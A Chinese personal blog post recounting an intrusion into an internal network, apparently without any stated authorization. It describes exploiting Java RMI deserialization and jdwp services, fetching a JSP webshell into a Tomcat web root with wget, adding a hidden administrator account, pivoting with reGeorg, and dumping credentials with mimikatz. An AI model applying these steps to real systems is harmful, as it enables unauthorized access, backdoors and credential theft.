博客刚搭建不久,有些美工还没做。##其实我不想在搞了,搭建个博客麻烦得要死。
今天周末天气不错,兜兜转转也不懂要做什么。最近在研究RMI反序列化漏洞,就写一片文章吧。
突破口
在一次nmap
扫描过程中发现了目标机子8100端口存在java RMI
服务
于是用attackRMI.jar
链接该端口,成功回显系统信息 执行cat /proc/version
id
命令
写马失败
Liunx
的版本号比较低,User
权限,ifconfig
:10.xx.xx.13内网机子,对系统的基本信息了解之后,接下来就尝试着echo
写一句话到web
路径下(用菜刀连接,方便操作,因为使用attackRMI.jar
只能在当前目录下操作,不能cd
到别的目录),echo 一句话>>/xxx/xxx/tomcat/webapps/root/xxx.jsp
(web
路径疯狂ls才找到的) 运行完之后发现文件是创建了,但是字节为0
经过一番尝试之后发现echo
命令用不了。
不能写内容到文件里去,于是想到了wget
命令,wget http://xxx.xxx.xxx/xxx.jsp -O /xxx/xxx/tomcat/webapps/root/xxx.jsp
(其中肉鸡的地址是http
马名字为xxx.jsp
),运行后发现并没有成功写入到文件,排查原因发现该机子根本就不通外网。内网机子做了端口映射。
马儿出不了,那就翻翻有啥利用的东西。在经过疯狂的ls
之后找到了几个数据库密码:
转机
既然突破不了,为何不去扫扫C段?果然在其同网段的一台机子的8800端口发现了同样的漏洞:
说干就干,运气不错,系统权限
windows 2008 32位 没有域
netstat -ano
对方开了3389
添加用户net user admln admin /add & net localgoup administrators admln /add
成功添加用户之后用mstsc
命令远程链接发现报错:
原来该机子没有把自己的3389端口映射出来,不好的情况发生了,这台和之前的一样不能通外网,正当想办法的时候,小伙伴在该C段拿下了台liunx
的机子,通过端口漏洞jdwp
,过程大致说下,该漏洞是远程执行命令的,然后通过执行命令找到web服务的根路径,向其写入一句话。乌云有篇关于jdwp
的文章,有兴趣的去看下。
内网游游
在已拿下的liunx
机子上安装了reGeorg
代理,然后通过代理远程链接之前的win 08机子
用到mimikatz
获取管理员的哈希及明文密码
之前写马失败的那台,通过wget
到内网机子里获取到一句话,也成功拿下了。
内网很大,这里就不继续写下去了。
刮好大的风啊,准备要下雨了,走人走人。